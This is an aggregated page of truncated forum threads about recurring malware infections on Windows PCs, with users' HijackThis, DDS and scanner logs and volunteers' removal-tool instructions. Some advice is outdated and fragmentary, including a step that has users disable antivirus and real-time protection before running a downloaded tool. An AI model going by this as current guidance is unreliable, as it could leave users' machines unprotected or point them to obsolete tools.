C:\Program Files\QuickTime\QTTask.exe
C:\Program Files\Webroot\Spy Sweeper\SpySweeperUI.exe
C:\PROGRA~1\ALWILS~1\Avast4\ashDisp.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Yahoo!\Messenger\ymsgr_tray.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Symantec\LiveUpdate\ALUSchedulerSvc.exe
C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe
C:\Program Files\Webroot\Spy Sweeper\SpySweeper.exe
C:\Program Files\Common Files\Symantec Shared\AppCore\AppSvc32.exe
C:\Program Files\Webroot\Spy Sweeper\SSU.EXE
C:\Documents and Settings\SCULL\Desktop\HijackThis.exe
C:\WINDOWS\system32\wuauclt.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\Program Files\Alwil Software\Avast4\setup\avast.setu...

Answer::( These three programs keep coming back...

Download SDFix and save it to your Desktop.

Double click SDFix.exe and it will extract the files to %systemdrive%
(Drive that contains the Windows Directory, typically C:\SDFix)

Please then reboot your computer in Safe Mode by doing the following :
Restart your computer
After hearing your computer beep once during startup, but before the Windows icon appears, tap the F8 key continually;
Instead of Windows loading as normal, the Advanced Options Menu should appear;
Select the first option, to run Windows in Safe Mode, then press Enter.
Choose your usual account.

Open the extracted SDFix folder and double click RunThis.bat to start the script.
Type Y to begin the cleanup process.
It will remove any Trojan Services and Registry Entries that it finds then prompt you to press any key to Reboot.
Press any Key and it will restart the PC.
When the PC restarts the Fixtool will run again and complete the removal process then display Finished, press any key to end the script and load your desktop icons.
Once the desktop icons load the SDFix report will open on screen and also save into the SDFix folder as Report.txt
(Report.txt will also be copied to Clipboard ready for posting back on the forum).
Finally paste the contents of the Report.txt back on the forum with a new Hijack This log

 

1 more replies

As the title says, whenever I start my PC, the language bar (right-click on the taskbar -> Toolbars -> Language bar) comes back. I can make it go away, but I have to do that every time I start my PC...

any ideas?
 

Answer:Language bar keeps coming back- Xp Pro x64

control panel > regional & language options > languages tab > text services and input > details > pref > language bar > deselect the "show the language bar"

iirc, been a while sorry
 

2 more replies

I have something called clspring. Every time I run a virus scan it comes up. Furthermore it keeps reinstalling itself. It appears to connect to something called www.outerinfo.com. Popups usually say http://c5.zedo.com. It has all but stopped my computer. How do I get rid of it for good? HijackThis log below.

Edit by chaslang: Inline log removed
 

Answer:clspring keeps coming back

Welcome to Majorgeeks!

Please do not post any logs inline with messages!

Please follow our standard cleaning procedures which are necessary for us to provide you support. Also there are steps included for installing, running, and posting HijackThis logs as attachments.

Run ALL the steps in this Sticky thread READ & RUN ME FIRST Before Asking for Support
Make sure you check version numbers and get all updates.
Very Important: Make sure you tell us the results from running the tutorial...was anything found? Were you unable to complete any of the scans?...Were you unable to download any of the tools?...Did you do the on-line scans as suggested? etc.

If, after doing ALL of the above, you still have a problem, make sure you have booted to normal mode and run the steps in the link below to properly use HijackThis and attach a log:
Downloading, Installing, and Running HijackThis

When you return to make your next post, make sure you attach the following logs and that you have run these scans in the following order too (these scans are covered in steps 6 & 7 of the READ & RUN ME sticky)
Bitdefender
Panda Scan
HijackThis

 

5 more replies

Ok, I have run both Ad-Aware and Spybot on a customer's PC. I got everything off, or so it looked like. I reboot and there are about 40 instances of adware/spyware that come right back. Mostly seems to be CoolWWWsearch. It repopulates the "hosts" file also. Then I rebooted and ran both Ad-Aware and Spybot again in safe mode. Ran CWShredder, cleaned the "hosts" file, and cleaned out all the TEMP directories. Everything checks out in safe mode but when I boot into regular mode, open IE, and run the spyware removal tools it is right back. Also the "hosts" file keeps getting junked up with bad addresses. I clear them out, save the file, reopen it and they are right back! Here is my HijackThis log and also the "hosts" file showing what keeps repopulating it. Thanks...

Logfile of HijackThis v1.98.2
Scan saved at 6:13:01 PM, on 12/3/2004
Platform: Windows XP (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 (6.00.2600.0000)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\rundll32.exe
C:\Program Files\Common Files\Symantec Shared\ccSetMgr.exe
C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
C:\WINDOWS\System32\devldr32.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Messenger\msmsgs.exe
C:\Program Files\HP\Digital Imaging\bin\...

Answer:Spyware keeps coming back...

16 more replies

Hi, Norton found the virus called Back door greybird.k on C:\windows\G_server_hook.dll. I logged on to the safe mode and deleted the G server. exe and dll file. But Norton keeps finding this virus. How can I clean the virus? Thanks very much.

(Moderator edit: moved post to more appropriate forum. jgweed)

Answer:Virus coming back again and again

Symantec Security Response

I'd recommend submitting a hijackthis log here.
How to submit a hijackthis log
Download Hijackthis

Try running the following from safe mode (Getting to safe-mode)

Sysclean: you'll also need the virus template file from here: lpt***.zip
or
DrWeb CureIT

If you're good with the command line also try Sophos Command Line scanner

Also try installing and running A2 Free and Ewido

I'd also run Spybot and Adaware

If you're using Win2K/XP run adaware/spybot from "safe mode with command prompt"

At the C:\ prompt type the following:-

cd\
C:\progra~1\spybot~1\spybotsd.exe /autocheck /autofix
cd\
C:\progra~1\lavasoft\ad-awa~1\ad-aware.exe

2 more replies

Hey, so I've gotten this malware and I know what program caused it but I deleted it and have no clue now, sorry :/ But the main issue is, as I said, I cleaned it with Adwcleaner and it finds it and removes it (I'm certain that's it) but when I restart Chrome it "re-installs" itself. Also I've used FRST but I don't know how useful it will be as I'm puzzled whether it worked or not. Now enough from the cryptic talk.

it's under
C:\Users\my user\Appdata\local\google\chrome\user data\default\secure preferences
inside the file (opened with notepad++)
this is the culprit:
plnkhmnoajbfccclonaeepohggeolcih (more details in uploaded logs)
Also, over time due to the popups it also installs some random tinytask thing + uk.ask.com or whatever search provider (also in logs)
Now, as I mentioned above, I've checked installed programs and services and found nothing out of the place. I have no clue how the hell I should go about fixing this as it's a nasty malware that doesn't wanna get removed. The only sites I found relating to this issue are Spanish and the forums even with translate didn't help much so I'm here to ask for some help! Thanks for anything in advance
 

Answer:Malware keeps coming back

Hello,

Your FRST report is empty and you are missing Addition.txt report.
 

9 more replies

Hi. My problem seems similar to what others have posted, but I know that each system is unique.

It seems like I am infected with some sort of malware. I was phished, but my norton symantec caught the trojan. However, now every two or three days the trojan comes back, only there are more and more of the infection. I tried a number of malware removal progams, which frequently find a problem. However, it has not solved the fact the trojan returns again in greater number in two or three days.

Thanks.

Below is my DDS file:

DDS (Ver_2012-10-19.01) - NTFS_AMD64
Internet Explorer: 9.0.8112.16421
Run by XXXXXXX at 15:56:52 on 2012-10-31
Microsoft Windows 7 Home Premium 6.1.7601.1.1252.1.1033.18.9207.6118 [GMT -4:00]
.
AV: Symantec Endpoint Protection *Enabled/Updated* {88C95A36-8C3B-2F2C-1B8B-30FCCFDC4855}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: COMODO Defense+ *Enabled/Updated* {FEEA52D5-051E-08DD-07EF-2F009097607D}
SP: Symantec Endpoint Protection *Enabled/Updated* {33A8BBD2-AA01-20A2-213B-0B8EB45B02E8}
FW: Symantec Endpoint Protection *Enabled* {B0F2DB13-C654-2E74-30D4-99C9310F0F2E}
FW: COMODO Firewall *Enabled* {7DB03214-694B-060B-1600-BD4715C36DBB}
.
============== Running Processes ===============
.
C:\Windows\system32\wininit.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Program Files (x86)\Common Files\Comodo\launcher_service.exe
C:\Windows\...

Answer:Trojan keeps coming back

Interestingly, I just ran rkill.exe and the problem returned. So, a number of "tmp" files were created in my users/MYNAME/AppData/Local/Temp folder.

The rkill log was:
Rkill 2.4.3 by Lawrence Abrams (Grinler)
http://www.bleepingcomputer.com/
Copyright 2008-2012 BleepingComputer.com
More Information about Rkill can be found at this link:
http://www.bleepingcomputer.com/forums/topic308364.html

Program started at: 10/31/2012 09:50:47 PM in x64 mode.
Windows Version: Windows 7 Home Premium Service Pack 1

Checking for Windows services to stop:

* No malware services found to stop.

Checking for processes to terminate:

* No malware processes found to kill.

Checking Registry for malware related settings:

* Explorer Policy Removed: NoActiveDesktopChanges [HKLM]

Backup Registry file created at:
C:\Users\XXXXXXX\Desktop\rkill\rkill-10-31-2012-09-51-01.reg

Resetting .EXE, .COM, & .BAT associations in the Windows Registry.

Performing miscellaneous checks:

* Windows Defender Disabled

[HKLM\SOFTWARE\Microsoft\Windows Defender]
"DisableAntiSpyware" = dword:00000001

* Windows Firewall Disabled

[HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall" = dword:00000000

Checking Windows Service Integrity:

* Windows Defender (WinDefend) is not Running.
Startup Type set to: Manual

* gpsvc =&g...

34 more replies

I've been on the phone with Microsoft every day since last Monday.
It started with Norton detecting one trojan but not being able to fix it, and a full system scan found over 100 Adwares. After dealing with not being able to open Windows Exp or Internet explorer, I deleted a trojan and spyware in the registry and got adaware and spybot on the system.

However, I keep having problems. As of yesterday,
I have deleted and found again
/Pribi
Backweb
Kenston
two other trojans and a worm that I don't have the names for, but none of them are new.

While on the phone with Msft this morning, I ran a search for Exe files and found Spite6, Tigger, Backdoor and about 26 others that looked suspicious.

The problem is Norton, PestPatrolAV, AVG, Housecall virus scans are not detecting anything other than Adware, which I can't shake off the computer.

I have installed a new firewall and AV software along with pestpatrol.
I have run Adaware and Spybot and here is my hJT log
Logfile of HijackThis v1.99.0
Scan saved at 6:51:25 PM, on 1/6/2005
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Hewlett-Packard\Toolbox2.0\Apache Tomcat 4.0\webapps\Toolbox\Status...

Answer:Have at least 10 trojans and they keep coming back

bump please
 

3 more replies

Ok, I have run Ewido, Cleanup, and Killbox and the trojan changed its name on the second log.

PLEASE HELP.... Hijack this file:
Logfile of HijackThis v1.99.1
Scan saved at 8:03:30 PM, on 11/2/2005
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
C:\WINDOWS\system32\HPConfig.exe
C:\Program Files\HPQ\Notebook Utilities\HPWirelessMgr.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\Program Files\Norton AntiVirus\navapsvc.exe
C:\Program Files\Common Files\TiVo Shared\Beacon\TiVoBeacon.exe
C:\Program Files\Common Files\Symantec Shared\Security Center\SymWSC.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\carpserv.exe
C:\Program Files\HPQ\One-Touch\OneTouch.EXE
C:\Program Files\Synaptics\SynTP\SynTPLpr.exe
C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
C:\Program Files\Common Files\Symantec Shared\ccApp.exe
C:\Program Files\Roxio\Easy CD Creator 5\DirectCD\DirectCD.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Program Files\QuickTime\qttask.exe
C:\Program Files\Messenger\msmsgs.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Common Files\TiVo Shared\Transfer\TivoTransfer.exe
C:\Program Files\iPod\bin\iPodService.exe...

Answer:Trojan keeps coming back

7 more replies

I was infected with some Malware, I thought I had gotten rid of it, but It came back and this time it doesn't go away, What should I do? How do I post a Hijack this Log?
 

Answer:Malware Keeps coming back

* Click here to download HJTsetup.exe.
Save HJTsetup.exe to your desktop.

Double click on the HJTsetup.exe icon on your desktop.
By default it will install to C:\Program Files\Hijack This.
Continue to click Next in the setup dialogue boxes until you get to the Select Additional Tasks dialogue.
Put a check by Create a desktop icon then click Next again.
Continue to follow the rest of the prompts from there.
At the final dialogue box click Finish and it will launch Hijack This.
Click on the Do a system scan and save a log file button. It will scan and then ask you to save the log.
Click Save to save the log file and then the log will open in notepad.
Click on "Edit > Select All" then click on "Edit > Copy" to copy the entire contents of the log.
Come back here to this thread and Paste the log in your next reply.
DO NOT have Hijack This fix anything yet. Most of what it finds will be harmless or even required.
 

1 more replies

Sorry, I had run these scans before I found this forum. I need your expert help.

Windows XP with svc pack 3 and all updates. I have been able to get around the malware by running a scan, deleting the infections and corrupt files, but they return at every start up.

Latest routine I did was this: ComboFix, then re start; Temp File Cleaner; Malwarebytes, then re-start. Infection still returns.

Thursday, AV suite suddenly loaded, I received several cmd line boxes that looked strange and then all Google searches got redirected to shopping sites. Other symptoms are standard stuff, have to re-name anti malware to get it to run, several tries to go to correct site from google, etc.

TDSSkiller has been run, GMER has been run; ComboFix has been run multiple times (logs saved and available); Malwarebytes run multiple times (logs available)

ComboFix shows
Infected
c:\winnt\system32\ernel32.dll
c:\winnt\system32\spool\prtprocs\w32x86\17931u.dll
c:\winnt\system32\spool\prtprocs\w32x86\5w555.dll

MalWareBytes shows
Registry Data Items Infected:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\DhcpNameServer (Trojan.DNSChanger) -> Data: 93.188.162.221,93.188.166.201 -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\NameServer (Trojan.DNSChanger) -> Data: 93.188.162.221,93.188.166.201 ...

Answer:DNSChanger keeps coming back

Hello and Welcome to the forums! My name is Gringo and I'll be glad to help you with your computer problems.

Some things to remember while we are working together.
Do not run any other tool until instructed to do so!
Please Do not Attach logs or put in code boxes.
Tell me about any problems that have occurred during the fix.
Tell me of any other symptoms you may be having as these can help also.
Do not run anything while running a fix.

In the upper right hand corner of the topic you will see a button called Options. If you click on this in the drop-down menu you can choose Track this topic. By doing this and then choosing Immediate E-Mail notification and then clicking on Proceed you will be advised when we respond to your topic and facilitate the cleaning of your machine.

We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.

In order for me to see the status of the infection I will need a new set of logs to start with.

Please print out or make a copy in notepad of any instructions given, as sometimes it is necessary to go offline and you will lose access to them.

DeFogger:
Please download DeFogger to your desktop.
Double click DeFogger to run the tool.
The ap...

3 more replies

here is the log:

Malwarebytes' Anti-Malware 1.34
Database version: 1823
Windows 5.1.2600 Service Pack 2

3/5/2009 9:18:09 PM
mbam-log-2009-03-05 (21-18-09).txt

Scan type: Quick Scan
Objects scanned: 65386
Time elapsed: 2 minute(s), 2 second(s)

Memory Processes Infected: 0
Memory Modules Infected: 0
Registry Keys Infected: 0
Registry Values Infected: 0
Registry Data Items Infected: 0
Folders Infected: 0
Files Infected: 1

Memory Processes Infected:
(No malicious items detected)

Memory Modules Infected:
(No malicious items detected)

Registry Keys Infected:
(No malicious items detected)

Registry Values Infected:
(No malicious items detected)

Registry Data Items Infected:
(No malicious items detected)

Folders Infected:
(No malicious items detected)

Files Infected:
C:\WINDOWS\system32\meI6qj75.dll (Trojan.Agent) -> Quarantined and deleted successfully.

Answer:trojan keeps coming back!

Please print out and follow these instructions: "How to use SDFix". When using this tool, you must use the Administrator's account or an account with "Administrative rights".

Disconnect from the Internet and temporarily disable your anti-virus, script blocking and any real time protection programs before performing a scan.
When done, the SDFix report log will open in notepad and automatically be saved in the SDFix folder as Report.txt.
If SDFix is unable to run after rebooting from Safe Mode, run SDFix in either Mode, and type F, then press Enter for it to finish the final stage and produce the report.
Please copy and paste the contents of Report.txt in your next reply.
Be sure to re-enable your anti-virus and other security programs before connecting to the Internet.

-- If the computer has been infected with the VirusAlert! malware warning from the clock and the Start Menu icons or drives are not visible, open the SDFix folder, right-click on either the XP_VirusAlert_Repair.inf or W2K VirusAlert_Repair.inf (depending on your version of Windows) and select Install from the Context menu. Then reboot to apply the changes.

10 more replies

hello

I have a virus Worm_RBOT.BCQ found on file C:\windows\system32\micront.exe

I have followed to the letter the removal instruction by Trend

I have deleted the file, deleted all Registry reference to this file, deleted all temp files and Bin , all in safe mode..

The virus seems to have been deleted. but when I connect to the net, after a while , virus is detected and all is back to square one..

Please Help!! how can I get rid of this Virus forever....

Thanx
Jadan
 

Answer:virus keeps coming back

10 more replies

Posting here, as instructed by Orange Blossom.

I run Malwarebytes Pro and I recently encountered an infection where all of my Autorun executables were being renamed to have a space before the name and another executable was being put in its place. I manually removed all of these dummy .exe's and searched the entire drive for any other .exe's with the same file size and recent modification date. I removed all I found. I've not run into any further issues similar to this.

I originally removed wmpscfgs.exe and js.mui from various folders using MBAM.

However, Malwarebytes Pro is popping up daily saying that wmpscfgs is infected in my Internet Explorer directory. Each time, I tell it to quarantine. Rinse, repeat. Malwarebytes continuously pops up down at the bottom of the screen saying 'Malwarebytes has blocked access to a potentially harmful website at 58.240.239.70' or something similar. The popup doesn't stay up long enough for me to get exact wording. (The IP varies, but this is the most recent pop up as of now.)

I've scanned with MBAM, SASW, CWShredder... It's still happening and I'm at a bit of a loss as to how to proceed. Any help is greatly appreciated.

I am running Windows 7 64 bit. I don't know if GMER just isn't compatible with the OS or what, but I wasn't able to select any of the checkboxes other than Services, Registry, Files, and ADS in addition to the C drive. It found nothing and the ark.log is empty, so I've not uplo...

Answer:wmpscfgs.exe Keeps coming back

Hello , And to the Bleeping Computer Malware Removal Forum. My name is Elise and I'll be glad to help you with your computer problems.

I will be working on your malware issues, this may or may not solve other issues you may have with your machine.

Please note that whatever repairs we make, are for fixing your computer problems only and by no means should be used on another computer.

The cleaning process is not instant. Logs can take some time to research, so please be patient with me. I know that you need your computer working as quickly as possible, and I will work hard to help see that happen.

Please reply using the Add/Reply button in the lower right hand corner of your screen. Do not start a new topic.

The logs that you post should be pasted directly into the reply. Only attach them if requested or if they do not fit into the post.

Unfortunately, if I do not hear back from you within 5 days, I will be forced to close your topic. If you still need help after I have closed your topic, send me or a moderator a personal message with the address of the thread or feel free to create a new one.

You may want to keep the link to this topic in your favorites. Alternatively, you can click the button at the top bar of this topic and Track this Topic, where you can choose email notifications. The topics you are tracking are shown here.

-----------------------------------------------------------

If you have since resolved the original problem you were having, we would appreciate you let...

81 more replies

I'm not entirely sure what infection I have here, but I think it has something to do with the Coupon Printer my friend downloaded a while back (I'm cleaning her computer for her)

It started out with a bunch of fake AV programs screaming at me to "fix all the infections". I downloaded and installed MBAM, but I couldn't run it until I rebooted in safe mode. It found 8 or 9 items and I cleaned them all. One of them was the following:

C:\Users\Haley\AppData\Local\Temp\Low\COUPON~1.DLL

Every time I restart the computer and re-run MBAM, that same file shows up, no matter how many times I've tried to delete it.

I thought I had fixed all the nasties because the fake AV is now gone, but I'm not so sure anymore. I'm pretty good at malware removal, but not great, so I thought I'd ask you guys to take a look.

Thanks!!

DDS (Ver_10-03-17.01) - NTFSx86
Run by Haley at 0:15:15.58 on Tue 05/11/2010
Internet Explorer: 7.0.6001.18000 BrowserJavaVersion: 1.6.0_13
Microsoft® Windows Vista™ Home Premium 6.0.6001.1.1252.1.1033.18.3034.1804 [GMT -6:00]

SP: Windows Defender *enabled* (Updated) {D68DDC3A-831F-4FAE-9E44-DA132C1ACF46}

============== Running Processes ===============

C:\Windows\system32\wininit.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k rpcss
c:\Program Files\Microsoft Security Ess...

Answer:Malware that keeps coming back

Hi,

Welcome to Bleeping Computer. My name is m0le and I will be helping you with your log.

Please subscribe to this topic, if you haven't already. You can subscribe by clicking the Options box to the right of your topic title and selecting Track This Topic.

Please avoid installing/uninstalling or updating any programs and attempting any unsupervised fixes or scans. This can make helping you impossible.

Please reply to this post so I know you are there.

The forum is busy and we need to have replies as soon as possible. If I haven't had a reply after 3 days I will bump the topic and if you do not reply by the following day after that then I will close the topic.

Once I receive a reply then I will return with your first instructions.

Thanks

12 more replies

Hi, So I have this virus. Every time Windows starts, and if it's connected to the internet before anti malware malwarebytes protection on, It will start downloading virus like crazy. MBAM can limit the virus somehow, but it still somehow allowed wuaucldt.exe and VRT***.tmp (*** is random number) and sometimes some random dll files. I also got random number dot exe and it contain w.exe, d.bin, ms.bin, so.bin. All of this happened if I connect to the internet and worse if there is no MBAM protection. I tried to remove it through registry and hijackthis, it just keep coming back. Make me think that all my exe files has been infected.

I sent winlogon.exe to several online file scanner and apparently has Virut on it.

I tried to use DDS.scr, but I keep getting error (0xc0000142). I tried to rename it lots of time with any name that I can think of and still the same problem. I tried to rename the file name into bat or exe, same problem.

ComboFix also has the same (0xc0000142) error. Gmer works, but it keeps going to the blue screen every time I scanned a lil longer (say more than 2 minutes). So I uncheck registry and files to make it faster. Here's the log.

I also attached hijackthis log if needed. Oh, I use Windows 7, and updated MBAM.

Thank you so much. Sorry for my English. I really really appreciate it.

PS : Sorry for repost. I don't know why the logs is not appear in the previous post.

Just in case if the log disappear again, I copy it to here :

GMER 1.0.15.15281 - http://www....

Answer:wuaucldt.exe keeps coming back

Hello and welcome to Bleeping Computer

We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.

If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine.

If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far.

Upon completing the steps below another staff member will review and take the steps necessary with you to get your machine back in working order clean and free of malware.

If you have already posted a DDS log, please do so again, as your situation may have changed.
Use the 'Add Reply' and add the new log to this thread.

Thanks and again sorry for the delay.

We need to see some information about what is happening in your machine. Please perform the following scan:

Download DDS by sUBs from one of the following links. Save it to your desktop.
DDS.scr
DDS.pif
Double click on the DDS icon, allow it to run.
A small box will open, with an explanation about the tool. No input is needed, the scan is running.
Notepad will open with the results.
Foll...

10 more replies

I have already been through the "Am I Infected" forum and I am sure that I am but I don't know how or with what.

Topic referenced is here: http://www.bleepingcomputer.com/forums/t/305217/security-breach/ ~ OB

We have run MBAM and GMER and removed some infections and the next day when I ran my Spyware Doctor, I was reinfected with two new infections. Already identified them as keyloggers and one was some type of autodialer. Anyway, I was told to run a DDS and post it here. Time for an operation, I guess. LOL

I am hoping to learn something from the process. I have already learned a lot just reading and researching on my own before I broke down and came to bleepingcomputer for help. I know when something is over my head and whatever this is.....is it! Thank you so kindly for the help!

Here is the DDS. I did run a GMER last night but for some reason, my system had crashed when I returned the computer so I did not have the results. If you would like for me to run another one, please advise and I will do it ASAP.

DDS (Ver_10-03-17.01) - NTFSx86
Run by Compaq_Owner at 0:48:56.29 on Sun 04/04/2010
Internet Explorer: 7.0.5730.11
Microsoft Windows XP Home Edition 5.1.2600.3.1252.1.1033.18.503.191 [GMT -4:00]

AV: Spyware Doctor with AntiVirus *On-access scanning enabled* (Updated) {D3C23B96-C9DC-477F-8EF1-69AF17A6EFF6}

============== Running Processes ===============

C:\WINDOWS\system32\svchost -k DcomLaunch
C:\WINDOWS\system32\svchost -k rpcss
C:\WINDOWS\System32\svchost.ex...

Answer:Malware keeps coming back.

Hello and Welcome to Bleepingcomputer

Please note we are very busy, so if I don't hear from you within 5 days the topic will be closed. If you have since resolved your issues I would appreciate if you would let me know so I can close this topic.

We need to create an OTL Report

Please download OTL from one of the following mirrors:
This is THE Mirror
Save it to your desktop.
Double click on the icon on your desktop.
Click the "Scan All Users" checkbox.
Under the Custom Scans/Fixes box at the bottom, paste in the following bold text.

%SYSTEMDRIVE%\*.exe
/md5start
eventlog.dll
scecli.dll
netlogon.dll
cngaudit.dll
sceclt.dll
ntelogon.dll
logevent.dll
iaStor.sys
nvstor.sys
atapi.sys
IdeChnDr.sys
viasraid.sys
AGP440.sys
vaxscsi.sys
nvatabus.sys
viamraid.sys
nvata.sys
nvgts.sys
iastorv.sys
ViPrt.sys
/md5stop
CREATERESTOREPOINT

Push the button.
Two reports will open, copy and paste them in a reply here:
OTL.txt <-- Will be opened
Extra.txt <-- Will be minimized

Thanks

42 more replies

I keep getting a weird virtumonde that keeps coming back. I scan SpyBot and it deletes it fine, but after a few days it's there again. One time I tried not visiting anything online for 2 days and it still came back. It keeps trying to load a .dll in the startup as a weird file name, mainly 'aasdfhfds' or 'wlwklaja'

Virtumonde.prx: [SBI $B6BF2145] Autorun settings (Rqeqoku) (Registry value, fixed) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Rqeqoku

This was the file that was removed using SpyBot. I also have an attached HijackThis log, if anyone would be willing to help.

Logfile of Trend Micro HijackThis v2.0.3 (BETA)
Scan saved at 12:21:50 AM, on 2/18/2010
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v8.00 (8.00.6001.18702)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Dell AIO Printer A920\dlbkbmgr.exe
C:\Program Files\Dell AIO Printer A920\dlbkbmon.exe
C:\Program Files\Microsoft ActiveSync\Wcescomm.exe
C:\PROGRA~1\MICROS~3\rapimgr.exe
C:\Program Files\CDBurnerXP\NMSAccessU.exe
C:\WINDOWS\system32\sv... Read more

Answer:Virtumonde.prx keeps coming back

Hello and welcome to Bleeping Computer

We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.

If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. Please include a clear description of the problems you're having, along with any steps you may have performed so far.

Please refrain from running tools or applying updates other than those we suggest while we are cleaning up your computer. The reason for this is so we know what is going on with the machine at any time. Some programs can interfere with others and hamper the recovery process.

Even if you have already provided information about your PC, we need a new log to see what has changed since you originally posted your problem.

We need to create an OTL Report

Please download OTL from one of the following mirrors:
This is THE Mirror
Save it to your desktop.
Double click on the icon on your desktop.
Click the "Scan All Users" checkbox.
In the custom scan box paste the following:

CODE
netsvcs
msconfig
safebootminimal
safebootnetwork
activex
drivers32
%systemroot%... Read more

2 more replies

Vundo Keeps coming back

OS:Windows XP, SP3

Hi,
I was forwarded from "http://www.bleepingcomputer.com/forums/t/203107/after-windows-update-multiple-program-errors-pc-restarting-on-its-own/" to post here.... That thread kinda died... anyway...

Over the past month I've found multiple instances of Vundo, and things seem to be getting worse.
Every time I try to clean my system, Vundo keeps coming back - even if I don't do any browsing.
Most recently, I've been experiencing applications freezing (Firefox, McAfee, Warcraft3)
The system has also crashed mid-scan using McAfee several times, but not lately.
I'm unsure if these problems are related to the Virus or other system issues - I figure get rid of the virus first and troubleshoot the rest later.
My system is fairly new (Dec 08), it came with McAfee Enterprise installed. I also installed the free version of Spyware Doctor on my computer.
Neither of which seem to be able to remove the Virus, and at times can not even detect it.

I've started to notice that sometimes McAfee is disabled after restarting the computer; I hadn't changed any settings for that to occur.

I've tried using Malwarebytes Anti-Malware as well as SUPER Anti-Spyware, both of which are doing a better job of finding and clearing traces of the virus (compared to McAfee). Also tried VirtumundoBeGone and in haste, ComboFix.

VirtumundoBeGone found no traces, and Combofix didn't do anything noticeable.

Please help!
Let me know if there are any logs or reports you ... Read more

Answer:Vundo Keeps coming back, not sure what to do

Well the best we can do is get an MBAM and perhaps a SUPER Anti-Spyware log to start with.

Open MBAM in normal mode and click Update tab, select Check for Updates, when done click Scanner tab, select Quick scan and scan. After scan click Remove Selected, Post new scan log and Reboot into normal mode.

3 more replies

so i didn't have this problem before and i JUST upgraded to SP2 via windows update and the installation went normal. everything seems to work fine but there's this program that i wasn't sure about that popped up as an alert from ZoneAlarm: MSNNOED.exe. i tried to google to see if this was a legit file but i couldn't find anything so i click no to not allow it to access the internet.

i ran my virus checker and it didn't pick up anything. but when i ran malwarebytes with the most recent update, it found 3 "infected" files, one of which was the MSNNOED.exe and malwarebytes says it's a trojan agent. also it finds a comsa32.sys file which it deems as a trojan agent. when i search for that MSNNOED.exe file on my computer, it's in the WINDOWS\SYSTEM32 directory and there's another file in the Prefetch directory: MSNNOED.EXE-05ABE18F.pf

not sure what they are but malwarebytes quarantines them and removes them but requires a restart, which i do. when i restart and load back up, everything is fine and the file is supposedly gone (meaning when i try doing a search, MSNNOED.exe isn't there anymore as well as the other files). but when i try to open up task manager to see if it really is, shortly afterward i get an alert from ZoneAlarm saying do i want to let MSNNOED.exe access the internet. i click no. i do a search on my system again and sure enough, those same files are back there. is there a "hidden" program that... Read more

Answer:MSNNOED.exe keeps coming back

i found something that problem might work here: http://www.bleepingcomputer.com/forums/t/178477/win32refpro/

